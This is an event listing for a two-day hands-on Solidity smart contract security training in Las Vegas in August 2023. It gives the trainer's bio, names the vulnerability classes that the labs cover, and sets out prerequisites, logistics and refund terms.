Davide Cioccia - Hackable.sol: Smart Contract Hacking in Solidity $1,500

Trainer(s) bio:

Davide Cioccia is the founder of dcodx, a cybersecurity firm focusing on bridging the gap between development and security, working together with development teams to create and promote the DevSecOps security culture.

He is one of the first contributors to the OWASP Mobile Security Testing Guide and member of the SANS advisory board and Chapter Lead of DevSecCon Netherlands. He is also a speaker at international security conferences like BlackHat, OWASP AppSec, DevSecCon, Hacktivity and regional OWASP security events, where he presented different approaches and tools to automate mobile security testing in CI/CD, detect and prevent phishing attacks and automate infrastructure security in the release cycles.

On the personal side he loves to play racket sports, from tennis to padel, from ping pong to beach tennis. So hit him up for a match if you are in the Netherlands.

Some links:

https://www.devseccon.com/chapters/dsc-netherlands/
https://appsecus2018.sched.com/event/F02G/mobile-bdd-security-tests-on-steroids-a-new-framework-to-automate-mstg-and-masvs-in-your-cicd-pipeline
https://www.blackhat.com/eu-18/arsenal/schedule/presenters.html#davide-cioccia-36753

Trainer(s) social media links:

https://www.linkedin.com/in/davidecioccia/
https://twitter.com/davide107

 

Training description:

A 2-day full hands-on training where you will learn how to identify vulnerabilities in Smart Contracts written in Solidity. During the course, we will go over 12 labs inspired by the major hacks that saw companies lose millions of dollars, implement Smart Contracts, but also perform security reviews and detect security flaws using manual analysis and automated tools.

Some of the scenarios we will go through:

The list below contains some of the vulnerabilities that we will identify and fix in the labs:

• Any user can cash out the money from the smart contract
• Users can buy the subscription also with any wei amount
• Any user can check the amount of money stored in the contract address
• Reentrancy vulnerability
• Block Timestamp Manipulation Vulnerability
• Tx.origin: Authorization bypass
• Integer Overflow and Underflow
• BatchTransfer Overflow (CVE-2018–10299)
• Unprotected SELFDESTRUCT
• DelegateCall vulnerabilities
• ....more

 

Outline:

The course is for beginners/intermediate that have some knowledge about smart contracts

Knowledge of the topics below is only recommended but not mandatory for this course.
Blockchain
Smart contracts and Remix IDE
Basic understanding of decentralized applications and their applicability

Suggested Prerequisites:

The course starts from the basics of the blockchain and smart contracts.
Useful resources:

  - https://docs.soliditylang.org/en/v0.8.13/
  - https://ethereum.org/

 

Student provided items:

- Laptop with at least:
     8 GB RAM
- Chrome Browser

 

DATE: August 14th-15th 2023
TIME: 8am to 5pm PDT
VENUE: Caesars Forum, Las Vegas, NV
TRAINER: Davide Cioccia

- 16 hours of training with a certificate of completion.

- 2 coffee breaks are provided per day
- Note: Food is not included

 

Registration terms and conditions:

Trainings are refundable before July 1st, the processing fee is $250.

Trainings are non-refundable after July 10th, 2023.

Training tickets may be transferred. Please email us for specifics.

Failure to attend the Training without prior written notification, will be considered a No-Show. No refund will be given.

By purchasing this ticket you agree to abide by the DCT Code of Conduct and the registration terms and conditions listed above.